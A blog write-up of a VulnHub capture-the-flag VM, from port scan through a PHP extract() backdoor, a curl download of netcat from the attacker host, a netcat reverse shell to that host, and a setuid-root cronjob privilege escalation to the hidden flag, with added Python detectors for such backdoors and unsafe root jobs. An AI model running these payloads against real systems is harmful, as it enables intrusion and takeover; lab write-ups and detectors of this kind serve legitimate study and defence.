Mr_H4sh

Infosec, CTF and more

Teuchter Solution

In this post I’m going to show you how to solve the Teuchter VM provided by Knightmare.

You can find the VM on this link

192.168.56.140 <== attacker
192.168.56.139 <== victim

I run an Nmap scan against the victim:

Nmap scan report for 192.168.56.139
Host is up, received arp-response (0.00037s latency).
Scanned at 2016-09-24 11:11:25 BST for 9s
Not shown: 65534 closed ports
Reason: 65534 resets
PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Dinnae Pwn Ma Server... Away and Hack some bawbag else!
MAC Address: 00:0C:29:BE:56:32 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
TCP/IP fingerprint:
OS:SCAN(V=7.12%E=4%D=9/24%OT=80%CT=1%CU=38656%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
OS:M=57E65157%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10D%TI=Z%CI=I%II=I
OS:%TS=8)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6
OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)

Ok, port 80 is open with Apache httpd 2.4.18 running, so I open a browser to see what’s being served. Hahaha, a Scottish Wullie from The Simpsons.

The source code of the page has some interesting comments:

<!-- Wullie's favourite film is the Breakfast Club -->
<!-- /gallery/ /flicks/ or /telly/ Maybe Jim Kerr can help with the music...?  -->
<!-- not a lot of people know about different extensions, such as .pht for PHP -->

I visit http://192.168.56.139/gallery/ and find a series of images, each with a comment in the page source.

I find http://192.168.56.139/flicks/phpinfo.pht, but it gives me an internal server error when I open it.

I do some Google research and find out that there’s a known PHP backdoor technique built around the “extract” function, which here is served through the .pht extension. I get the details of the vulnerability from this URL: https://blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html

So I manage to get a reverse shell using the following URLs:

Check that the vulnerability works

http://192.168.56.139/flicks/phpinfo.pht?ctime=system&atime=whoami

I get “www-data”, so it works. Time to get a reverse shell.

Download Netcat, put it in “/tmp/” and make it executable

http://192.168.56.139/flicks/phpinfo.pht?ctime=system&atime=curl%20http://192.168.56.140/nc%20%3E%20/tmp/nc
http://192.168.56.139/flicks/phpinfo.pht?ctime=system&atime=chmod%20777%20/tmp/nc

Execute a reverse shell

http://192.168.56.139/flicks/phpinfo.pht?ctime=system&atime=/tmp/nc%20192.168.56.140%208080%20-e%20/bin/bash
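From the defender’s side, the requests above leave a very recognisable trace: the attacker has to pass the name of a PHP function (system) as a query-string value, and the backdoor file itself has the extract()-plus-variable-function shape the Sucuri post describes. The following is an added example of mine, not code from the VM or from Knightmare, that checks for both: it scans Apache access-log lines for query values naming dangerous PHP functions, and scans PHP source for the extract($_GET)/$a($b) pattern. The log lines and the PHP snippet are constructed samples modelled on this write-up (192.168.56.140 is the attacking host from the post); the function names and regexes are my own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# PHP functions that run OS commands or evaluate code.  With an extract()-style
# backdoor the attacker supplies the *function name* as a query-string value
# (ctime=system in the requests above), so the value, not the parameter name,
# is what to match on.
DANGEROUS_PHP_FUNCS = {
    "system", "exec", "shell_exec", "passthru", "popen", "proc_open",
    "eval", "assert", "create_function",
}

# Apache "common"/"combined" log line: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Source-side halves of the pattern: extract() over a request superglobal,
# and a call whose function name is itself a variable ($a($b)).
EXTRACT_RE = re.compile(r'\bextract\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b')
VARCALL_RE = re.compile(r'\$[A-Za-z_]\w*\s*\(\s*\$[A-Za-z_]\w*')


def suspicious_params(target):
    """Return {param: value} for query parameters whose value names a dangerous PHP function."""
    query = urlsplit(target).query
    return {k: v for k, v in parse_qsl(query, keep_blank_values=True)
            if v.strip().lower() in DANGEROUS_PHP_FUNCS}


def scan_access_log(lines):
    """Return (client_ip, request_target, {param: function}) for every request
    that passes a dangerous PHP function name in its query string."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        bad = suspicious_params(m.group("target"))
        if bad:
            hits.append((m.group("ip"), m.group("target"), bad))
    return hits


def find_extract_backdoor(php_source):
    """Return (lines_with_extract, lines_with_variable_call); a file that has
    both is the shape of the extract() backdoor and deserves a manual look."""
    src_lines = php_source.splitlines()
    extract_at = [n for n, l in enumerate(src_lines, 1) if EXTRACT_RE.search(l)]
    varcall_at = [n for n, l in enumerate(src_lines, 1) if VARCALL_RE.search(l)]
    return extract_at, varcall_at


# Constructed sample log lines modelled on the requests in this write-up.
SAMPLE_LOG = """\
192.168.56.140 - - [24/Sep/2016:11:20:01 +0100] "GET /flicks/phpinfo.pht?ctime=system&atime=whoami HTTP/1.1" 200 512
192.168.56.140 - - [24/Sep/2016:11:20:05 +0100] "GET /gallery/ HTTP/1.1" 200 4096
192.168.56.140 - - [24/Sep/2016:11:21:30 +0100] "GET /flicks/phpinfo.pht?ctime=system&atime=chmod%20777%20/tmp/nc HTTP/1.1" 200 0
192.168.56.140 - - [24/Sep/2016:11:22:00 +0100] "GET /telly/?page=2 HTTP/1.1" 200 1200
""".splitlines()

# Constructed PHP in the shape described by the Sucuri write-up linked above.
SAMPLE_PHP = """<?php
extract($_GET);
@$ctime($atime);
"""

if __name__ == "__main__":
    for ip, target, bad in scan_access_log(SAMPLE_LOG):
        print(f"{ip} -> {target}  params naming PHP functions: {bad}")
    print("extract / variable-call lines:", find_extract_backdoor(SAMPLE_PHP))
```

Two caveats: the log check only sees GET query strings (POST bodies are not in the access log), and both checks are defeated by obfuscated names (string concatenation, base64), so treat them as a cheap first pass and follow up on any .pht/.php file under the web root that wasn’t put there by you.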

Once I’ve got a reverse shell I look for a way to get a stable one. Python is installed, so I spawn a shell through it:

locate python
/usr/bin/python3

python3 -c "import pty; pty.spawn('/bin/bash');"

Now that I have a shell, I go to /home and see that I can access the “jkerr” home directory, where there’s a file called “login.txt” with a hint to a password:

www-data@teuchter:/home/jkerr$ ls -l
ls -l
total 3932
-rw-rw-r-- 1 jkerr jkerr 3429261 Jul  2 14:29 breakfastclub.jpg
-rw-rw-r-- 1 jkerr jkerr     234 Jul  9 12:10 login.txt
-rw------- 1 jkerr jkerr  588685 Jul  9 13:22 promisedyouamiracle.jpg
www-data@teuchter:/home/jkerr$ cat login.txt
cat login.txt
Jim,

I decided to rename your account to jkerr and reset the password
you'll find it in the photo. Just remember the decode password
dosn't have a space.

If you can't figure it out, it's the new name for Jonny & the
Self-Abusers...

I thought there would be a password within the image, but it turns out that it was the name of the file, which I also found out thanks to a list of passwords generated from a wordlist retrieved from the web application. The password of jkerr was “breakfastclub”, as also mentioned in the comment on the web application.

Once logged in as jkerr, I download the images and see that the file “promisedyouamiracle.jpg” contains some information in the “Copyright” section, which I’ve retrieved using “exiftool”:

# exiftool promisedyouamiracle.jpg 
ExifTool Version Number         : 10.31
File Name                       : promisedyouamiracle.jpg
Directory                       : .
File Size                       : 575 kB
File Modification Date/Time     : 2016:07:09 13:22:13+01:00
File Access Date/Time           : 2016:11:19 17:07:51+00:00
File Inode Change Date/Time     : 2016:11:17 21:51:04+00:00
File Permissions                : rw-------
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.02
DCT Encode Version              : 100
APP14 Flags 0                   : (none)
Exif Byte Order                 : Big-endian (Motorola, MM)
Copyright                       : Z2VtaW5pCg==
Padding                         : (Binary data 2060 bytes, use -b option to extract)
Compression                     : JPEG (old-style)
[..]
Photoshop Format                : Optimized
Progressive Scans               : 3 Scans
About                           : uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b
Rights                          : Z2VtaW5pCg==
Image Width                     : 800
Image Height                    : 600
[..]

The string “Z2VtaW5pCg==” is the base64 encoding of “gemini”. This is the password for the user “proclaimers”. I log in as proclaimers, go to the folder “/home/proclaimers” and list the files.

proclaimers@teuchter:~$ pwd
pwd
/home/proclaimers
proclaimers@teuchter:~$ ls -l
ls -l
total 228
drwx------ 2 proclaimers proclaimers   4096 Jul  9 12:49 500miles
-rw-rw-r-- 1 proclaimers proclaimers 225280 Nov 13 14:32 500miles.tar
drwxr-xr-x 2 proclaimers proclaimers   4096 Nov 17 21:58 letterfromamerica
proclaimers@teuchter:~$ cd letterfromamerica
cd letterfromamerica
proclaimers@teuchter:~/letterfromamerica$ ls -l
ls -l
total 172
-rwsr-xr-x 1 root root   8736 Nov 17 21:58 semaphore
-r-Sr-sr-t 1 root root     42 Jul  9 13:57 test

That “semaphore” file is a copy of the “dash” shell, and it has the SUID bit set. At this point I suspect there must be a cronjob, so I search for something that might use “semaphore”:

proclaimers@teuchter:~$ grep -R "semaphore" /usr/local 2>/dev/null
grep -R "semaphore" /usr/local 2>/dev/null
/usr/local/bin/numpties.sh:## Plant a semaphore in to alert the monitoring system
/usr/local/bin/numpties.sh:if /usr/bin/[ -f /home/proclaimers/letterfromamerica/semaphore ]
/usr/local/bin/numpties.sh:    /bin/chown root.root /home/proclaimers/letterfromamerica/semaphore
/usr/local/bin/numpties.sh:    /bin/chmod 4755 /home/proclaimers/letterfromamerica/semaphore

proclaimers@teuchter:~$ cat /usr/local/bin/numpties.sh
cat /usr/local/bin/numpties.sh
#!/bin/sh

## Right, time to sort out these numpties that put PHP shells on ma server!

## Steal a copy to examine later
/bin/tar czvf /root/shells.tgz /var/www/html/*.php

## Aww they dobbers with primative Egpytian Encryption can away and raffle themselves
sudo apt-get -y purge openssh-server sftp wget 

## Delete the shells to annoy the eejits
/bin/rm -rf /var/www/html/*.php

## Plant a semaphore in to alert the monitoring system
if /usr/bin/[ -f /home/proclaimers/letterfromamerica/semaphore ]
  then
    /bin/chown root.root /home/proclaimers/letterfromamerica/semaphore
    /bin/chmod 4755 /home/proclaimers/letterfromamerica/semaphore
fi

Ok, this means that a cronjob will chown to root and set the SUID bit on “semaphore” if the file exists. I can replace the file with a small program of my own that runs a bash as root:

$ cat shell.c 
#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <sys/types.h>
#include <unistd.h>     /* setuid(), setgid() */
int main(void)
{
  /* once the cronjob has chown'ed the binary to root and chmod'ed it 4755,
     these calls succeed and the spawned bash runs with uid 0 */
  setuid(0); setgid(0); system("/bin/bash");
  return 0;
}

$ gcc -o semaphore shell.c && chmod 777 semaphore
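The root cause here is worth spelling out from the admin’s side: a root-owned cronjob runs chown root and chmod 4755 on a path that lives inside an unprivileged user’s home directory, so whatever that user puts at that path becomes a setuid-root binary. The following is an added example of mine, not part of the VM or of Knightmare’s scripts, that audits for exactly this in two ways: a static check over a root-run shell script for chown-to-root / set-id chmod commands whose target is under a user-controlled directory, and a filesystem walk that reports setuid files owned by root under a given tree (run it over /home). The embedded copy of the numpties.sh fragment is the sample input; the list of “untrusted” prefixes, the regexes and the function names are my own assumptions.

```python
import os
import re
import stat

# Directories an unprivileged user controls; a root job must never chown/chmod
# a path under these, because the user chooses what that path contains.
UNTRUSTED_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")

# chown/chmod invocations, with or without an absolute path to the binary.
CMD_RE = re.compile(r'^\s*(?:/usr)?(?:/bin/)?(chown|chmod)\s+(\S+)\s+(\S+)')


def _mode_adds_setid(mode_arg):
    """True for chmod modes that set setuid or setgid (4755, 2755, 6755, u+s, g+s, +s)."""
    if re.fullmatch(r'[0-7]{4}', mode_arg):
        return int(mode_arg[0]) & 0o6 != 0      # leading octal digit: 4 = setuid, 2 = setgid
    return bool(re.search(r'\+[rwxt]*s', mode_arg))


def audit_root_script(script_text):
    """Return (line_no, command, target) for every chown-to-root or set-id chmod
    whose target lies under a user-controlled directory."""
    findings = []
    for n, line in enumerate(script_text.splitlines(), 1):
        m = CMD_RE.match(line)
        if not m:
            continue
        cmd, arg, target = m.groups()
        if not target.startswith(UNTRUSTED_PREFIXES):
            continue
        if cmd == "chown" and re.fullmatch(r'(root|0)([.:](root|0))?', arg):
            findings.append((n, cmd, target))
        elif cmd == "chmod" and _mode_adds_setid(arg):
            findings.append((n, cmd, target))
    return findings


def find_setuid_files(root, required_owner_uid=0):
    """Walk `root` without following symlinks and return regular files that carry
    the setuid bit and are owned by `required_owner_uid` (0 = root).  Run over
    /home this reports exactly the artefact numpties.sh leaves behind."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if (stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID
                    and st.st_uid == required_owner_uid):
                found.append(path)
    return sorted(found)


# The relevant part of /usr/local/bin/numpties.sh from this write-up,
# embedded here as the sample input for the static check.
NUMPTIES_SH = """\
#!/bin/sh
## Plant a semaphore in to alert the monitoring system
if /usr/bin/[ -f /home/proclaimers/letterfromamerica/semaphore ]
  then
    /bin/chown root.root /home/proclaimers/letterfromamerica/semaphore
    /bin/chmod 4755 /home/proclaimers/letterfromamerica/semaphore
fi
"""

if __name__ == "__main__":
    for n, cmd, target in audit_root_script(NUMPTIES_SH):
        print(f"line {n}: root runs {cmd} on user-controlled path {target}")
    for path in find_setuid_files("/home"):
        print("setuid-root file under /home:", path)
```

The fix on the VM side is simply not to do this: a “semaphore” that a monitoring system watches needs no ownership change at all, and a root job should only ever touch files under root-owned directories that no other user can write to.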

After a minute, I see that the new binary has the SUID bit set, so I run it and I’m root:

proclaimers@teuchter:~/letterfromamerica$ ls -l
ls -l
total 172
-rwsr-xr-x 1 root root   8736 Nov 17 21:58 semaphore

proclaimers@teuchter:~/letterfromamerica$ ./semaphore
./semaphore
root@teuchter:~/letterfromamerica# id
id
uid=0(root) gid=0(root) groups=0(root),1002(proclaimers)
root@teuchter:~/letterfromamerica# 

Got root, now it’s time for a flag.

root@teuchter:/root# ls -l
ls -l
total 1084
-rw-r--r-- 1 root root 1094752 Jul  9 14:58 flag.jpg
-rw-r--r-- 1 root root     108 Sep 23 09:48 flag.txt
drwx------ 3 root root    4096 Aug  1 22:18 re-record-not-fade-away
-rw-r--r-- 1 root root      45 Nov 19 17:30 shells.tgz
root@teuchter:/root# cat flag.txt
cat flag.txt
I say! I say! I say boy! Y'all interested in hochmagandy again...?

Y'all know this aint the correct flag! 

Well, typical of Knightmare. It’s not over. There’s a folder called “re-record-not-fade-away”. I get in and, after a few nested folders, I find a zip file:

---------- 1 root root 12398481 Aug  1 22:11 TeuchterESX.zip
<e-away/on/and/on/and/on/and/on/and/on/and/ariston# pwd
pwd
/root/re-record-not-fade-away/on/and/on/and/on/and/on/and/on/and/ariston
<e-away/on/and/on/and/on/and/on/and/on/and/ariston# ls -l
ls -l
total 12108
---------- 1 root root 12398481 Aug  1 22:11 TeuchterESX.zip

I download the zip file, which is protected by password. The password is “teuchter”.

Once unzipped, there’s a vmdk file called TeuchterESX.vmdk.

I attach it to my Kali machine, restart the machine, and mount it with vmfs-fuse. I find an ISO inside the mounted volume, so I mount that too:

root@kali:~/Desktop/lab/teuchter# cd mount/
root@kali:~/Desktop/lab/teuchter/mount# ls -l
total 8
-rw------- 1 root root  180 Aug  1 21:52 hint.txt
drwxr-xr-x 2 root root 1120 Aug  1 21:52 redkola
root@kali:~/Desktop/lab/teuchter/mount# ls -l redkola/
total 2056
-rw------- 1 root root 104857600 Aug  1 21:24 redkola_1-flat.vmdk
-rw------- 1 root root       493 Aug  1 21:24 redkola_1.vmdk
-rw------- 1 root root    432128 Aug  1 21:51 redkola.iso
-rw------- 1 root root      8684 Aug  1 21:26 redkola.nvram
-rw-r--r-- 1 root root         0 Aug  1 21:08 redkola.vmsd
-rwxr-xr-x 1 root root      2147 Aug  1 21:26 redkola.vmx
root@kali:~/Desktop/lab/teuchter/mount# mkdir ../redkola_iso && cp -R redkola/ ../redkola_iso
root@kali:~/Desktop/lab/teuchter/mount# cd ../redkola_iso && mkdir mount
root@kali:~/Desktop/lab/teuchter/redkola_iso# mount -o loop redkola.iso mount/
mount: /dev/loop0 is write-protected, mounting read-only
root@kali:~/Desktop/lab/teuchter/redkola_iso# ls -l mount/
total 74
-r-xr-xr-x 1 root root 75110 Aug  1 21:38 glass_ch.jpg

This image is just a picture of Irn-Bru (glass cheque). There’s nothing else in this folder, so I suppose there’s something hidden in the image which I could retrieve using “steghide”.

I read the hint inside the TeuchterESX.vmdk that I’ve mounted through vmfs-fuse, and this is what I find:

root@kali:~/Desktop/lab/teuchter/mount# cat hint.txt 
Almost there.. Check the ISO and remember password relates to the TV Advert you watched.

I took out the spaces but it's 25 characters but the Wikipedia page will get it for you.

I get back on the web application, and in the /telly page source there’s a hint on the second video:

<!-- noise up those crazy yanks 1st hint to a password -->
<video height="300" width="400" controls>
<source src="girders.ogv" type="video/ogg">
</video>

At this point I watch the video again, and at the end it says “Made in Scotland from girders”. I search the Wikipedia page for the advertisements’ titles, and the one for the video I’ve watched is indeed “Made in Scotland from girders”. This title, without spaces, is exactly 25 characters, so I try “steghide” with the passphrase “madeinscotlandfromgirders”, and I get the flag:

root@kali:~/Desktop/lab/teuchter# steghide extract -sf glass_ch.jpg 
Enter passphrase: 
wrote extracted data to "realflag.txt".
root@kali:~/Desktop/lab/teuchter# cat realflag.txt 

Gaun Yersel Big Man! B-)

Congratulations for the fifth time on capturing this flag!

Yes, I know this VM has really got on your nerves, and that was the main
point...

I decided to have some fun with you, and hopefully you have learned some
new ways to look at things. You know, all this could have been avoided
if Siri just leanred what "outwith" means, I wouldn't have to build this
VM. I'm trolling you again of course!

I hope this VM was fun for you, and I'm sure you can now insult people
in another language :-)

Thanks to mrb3n who shared a joke with me and pushing me to set up a VM
for trolling everyone.

Shout-outs yet again to #vulnhub for hosting a great learning tool and
being a great inspiration to make these VMs. A special thanks goes to
mrb3n, cmaddy and GKNSB for repeated testing. Many thanks to g0tM1lk
for providing some valuable feedback and offering to host my CTF again.
                                                           --Knightmare

Thank you to Knightmare for the VM and Vulnhub for hosting it. For any information or comment, please do not hesitate to leave a comment.